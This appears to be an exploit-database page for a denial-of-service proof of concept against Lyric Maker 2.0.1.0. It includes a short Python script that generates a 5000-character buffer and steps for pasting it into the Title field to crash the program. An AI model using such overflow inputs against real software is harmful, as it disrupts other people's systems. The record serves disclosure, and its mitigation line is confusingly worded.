header-logo
Suggest Exploit
vendor:
Lyric Maker
by:
Alejandra Sánchez
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Lyric Maker
Affected Version From: 2.0.1.0
Affected Version To: 2.0.1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:jetaudio:lyric_maker:2.0.1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2019

Lyric Maker 2.0.1.0 – Denial of Service (PoC)

A denial of service vulnerability exists in Lyric Maker 2.0.1.0 due to a buffer overflow when copying a large amount of data to the 'Title' field. An attacker can exploit this vulnerability by running a python script to generate a text file with a large amount of data, copying the data to the clipboard, pasting it into the 'Title' field, and then saving the file. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of Lyric Maker 2.0.1.0 or later.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.jetaudio.com/
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
# Version: 2.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
# 2.- Copy the text from the generated LyricMaker.txt file to clipboard
# 3.- Open JetLyric.exe or Lyric Maker
# 4.- Paste clipboard in in the field "Title"
# 5.- Go to file -> Save Lyric...
# 6.- Save the file with any name, e.g 'sample.jlr'
# 7.- Crashed

buffer = "\x41" * 5000
f = open ("LyricMaker.txt", "w")
f.write(buffer)
f.close()